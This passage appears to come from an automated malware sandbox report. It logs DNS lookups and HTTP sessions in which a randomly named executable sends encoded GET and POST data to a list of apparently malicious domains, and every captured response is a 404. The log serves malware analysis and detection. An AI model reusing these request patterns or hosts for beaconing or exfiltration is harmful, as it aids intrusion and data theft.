                                                                            Nov 24, 2024 08:24:25.389416933 CET1.1.1.1192.168.2.100x6347No error (0)www.whisperart.net199.59.243.227A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:40.281846046 CET1.1.1.1192.168.2.100x8f88No error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:24:55.797934055 CET1.1.1.1192.168.2.100x9288No error (0)www.717hy.net68.66.226.92A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:25:10.595948935 CET1.1.1.1192.168.2.100xdf5fNo error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                                            Nov 24, 2024 08:25:10.595948935 CET1.1.1.1192.168.2.100xdf5fNo error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.bpgroup.site
                                                                            • www.bookingservice.center
                                                                            • www.tempatmudisini06.click
                                                                            • www.hm35s.top
                                                                            • www.snehasfashion.shop
                                                                            • www.sitioseguro.blog
                                                                            • www.windsky.click
                                                                            • www.cssa.auction
                                                                            • www.moviebuff.info
                                                                            • www.whisperart.net
                                                                            • www.christinascuties.net
                                                                            • www.717hy.net
                                                                            • www.izmirescortg.xyz

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.104978674.48.143.82804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:21:46.972889900 CET422OUTGET /p8wp/?GX6Lp2F=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnjhE6i9YZvkkiI4bTXFL7F6jfGLzFg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.bpgroup.site
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:21:48.178298950 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:21:48 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:21:48.178306103 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.104982798.124.224.17804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:04.163008928 CET709OUTPOST /47f1/ HTTP/1.1
                                                                            Host: www.bookingservice.center
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.bookingservice.center
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.bookingservice.center/47f1/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 70 49 74 44 71 45 58 72 42 4e 53 6b 33 6f 31 76 76 2b 43 4d 53 53 57 56 63 78 66
                                                                            Data Ascii: GX6Lp2F=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXpItDqEXrBNSk3o1vv+CMSSWVcxf
                                                                            Nov 24, 2024 08:22:05.420481920 CET1236INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Server: Microsoft-IIS/10.0
                                                                            X-Powered-By: ASP.NET
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Date: Sun, 24 Nov 2024 07:22:04 GMT
                                                                            Connection: close
                                                                            Content-Length: 1245
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                            Nov 24, 2024 08:22:05.420553923 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                            Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.104983398.124.224.17804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:06.836602926 CET733OUTPOST /47f1/ HTTP/1.1
                                                                            Host: www.bookingservice.center
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.bookingservice.center
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.bookingservice.center/47f1/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 65 6e 66 61 77 4a 76 37 49 35 48 30 67 67 38 6f 50 35 54 58 78 4b 51 2f 37 79 37 2f 2f 42 4d 66 78 68 47 72 4d 30 44 7a 74 79 72 56 49 4b 6e 6e 59 45 69 41 53 77 2b 4a 4d 52 5a 30 6c 6d 4f 43 64 63 6d 61 45 72 39 46 39 44 4b 30 45 63 64 6f 61 39 68 59 57 4c 78 58 6a 75 7a 2b 73 47 54 6b 53 73 69 54 44 31 4a 34 72 76 68 64 74 70 6b 31 42 4a 77 71 6a 62 57 4a 55 70 50 37 59 69 32 51 63 37 6a 57 56 79 2b 2b 66 56 66 6c 4f 59 62 61 45 31 44 30 4a 67 42 62 4c 52 78 73 43 49 36 73 37 72 6e 2f 2b 58 34 67 3d 3d
                                                                            Data Ascii: GX6Lp2F=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELenfawJv7I5H0gg8oP5TXxKQ/7y7//BMfxhGrM0DztyrVIKnnYEiASw+JMRZ0lmOCdcmaEr9F9DK0Ecdoa9hYWLxXjuz+sGTkSsiTD1J4rvhdtpk1BJwqjbWJUpP7Yi2Qc7jWVy++fVflOYbaE1D0JgBbLRxsCI6s7rn/+X4g==
                                                                            Nov 24, 2024 08:22:08.089090109 CET1236INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Server: Microsoft-IIS/10.0
                                                                            X-Powered-By: ASP.NET
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Date: Sun, 24 Nov 2024 07:22:07 GMT
                                                                            Connection: close
                                                                            Content-Length: 1245
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                            Nov 24, 2024 08:22:08.089108944 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                            Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.104983998.124.224.17804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:09.500730038 CET1746OUTPOST /47f1/ HTTP/1.1
                                                                            Host: www.bookingservice.center
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.bookingservice.center
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.bookingservice.center/47f1/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 47 6e 66 76 6b 4a 39 4d 6b 35 41 30 67 67 2f 6f 50 38 54 58 78 74 51 2f 44 4d 37 2f 43 38 4d 64 5a 68 58 35 30 30 54 42 4a 79 78 46 49 4b 6f 48 59 2f 2f 51 53 66 2b 49 38 56 5a 30 31 6d 4f 43 64 63 6d 63 6f 72 30 30 39 44 4d 30 45 66 63 6f 61 70 6c 59 57 76 78 58 37 2b 7a 2b 34 57 54 56 75 73 69 79 7a 31 4c 4b 54 76 70 64 74 72 6e 31 41 4f 77 72 66 36 57 4a 59 66 50 37 38 63 32 58 51 37 6e 78 51 56 74 4e 48 57 4e 6d 79 56 46 70 30 72 52 52 46 2f 59 66 6e 4e 36 50 75 41 6c 50 37 38 79 4c 54 4a 68 4e 76 52 67 75 78 6a 51 6d 31 76 42 42 4e 43 41 6a 73 36 44 5a 6d 30 2f 6c 7a 4f 4a 52 33 44 6d 4b 53 7a 39 44 39 5a 63 61 4f 78 54 45 51 6c 30 53 6f 54 62 43 56 7a 32 65 66 4a 6e 67 34 75 45 4e 77 6b 62 78 48 2b 36 33 72 41 31 37 50 59 57 33 56 6f 37 78 49 71 48 45 44 55 74 46 47 68 53 30 2b 63 46 4a 43 2f 39 4c 44 72 75 69 43 6e 42 4b 7a 4b 48 4b 36 4d 6a 45 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELGnfvkJ9Mk5A0gg/oP8TXxtQ/DM7/C8MdZhX500TBJyxFIKoHY//QSf+I8VZ01mOCdcmcor009DM0EfcoaplYWvxX7+z+4WTVusiyz1LKTvpdtrn1AOwrf6WJYfP78c2XQ7nxQVtNHWNmyVFp0rRRF/YfnN6PuAlP78yLTJhNvRguxjQm1vBBNCAjs6DZm0/lzOJR3DmKSz9D9ZcaOxTEQl0SoTbCVz2efJng4uENwkbxH+63rA17PYW3Vo7xIqHEDUtFGhS0+cFJC/9LDruiCnBKzKHK6MjE2epC0rhoYOG74r8pl9LhdRjOTTY/9AuI3cCz6oDBIu2vQFBItxzaH/7A1fu1RjkVaiXEslaG6lAzMJpIV7Z2+I1yECgijrteJ6apXBsUIJ/ydC98uixUKYh/vJn6Vu73Ka1dBX/uVk8e80pEVO++AGMygrzjpxVFGcK1643JJdDxyh3OOH23eWWQJYeyCT1ymE5Ji6w9pn8WRgtIYKCxcEnDuC2I8ju/8Uc8S0IjIGJfFHytEvNbgl8NitdenACCdiuxyprNu3/oE0tdWdgAhc0YFQWSOqHMNFwtZnpiZIXVHNwQwGcr6P776YWIk+SHGQGj8hctiIoP6Xeb1rnCr4ucSBq8DBEaACkfo66DSIeoOv2SBK4RnZGsqfYQBIPoge5Bswv24rWDrxCUi1IX2/RAWme5e2f6CE3tjPttS5SsFnNhQprN2ZxhY455xEQe3EywaAXO9gsS7wWz02jddciW2wmL9ntm2TcIFTXanKcoiqqmLS90NOcRpkhaDucwvPO+Y50OCTOZBFqaQ++hV2H8bWEhE+KO6TJkr/zJILSKJMCdJEUgjr1dcEbwryNaxmZVeIZkl1e6Y5+PNs1L6vyJRtbF58hLdRGN9aj1gT8fHgtcd3rqPaWBYxxKnE3S9fqCgEs/dkEjo1NsWYImrkEnkB5hkZfUPD [TRUNCATED]
                                                                            Nov 24, 2024 08:22:10.819366932 CET1236INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Server: Microsoft-IIS/10.0
                                                                            X-Powered-By: ASP.NET
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Date: Sun, 24 Nov 2024 07:22:10 GMT
                                                                            Connection: close
                                                                            Content-Length: 1245
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                            Nov 24, 2024 08:22:10.819448948 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                            Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.104984698.124.224.17804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:12.151643038 CET431OUTGET /47f1/?GX6Lp2F=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8FZPnmItglef8oIfH3xEPH5Gk5cdjw==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.bookingservice.center
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:13.321402073 CET1236INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Server: Microsoft-IIS/10.0
                                                                            X-Powered-By: ASP.NET
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Date: Sun, 24 Nov 2024 07:22:12 GMT
                                                                            Connection: close
                                                                            Content-Length: 1245
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
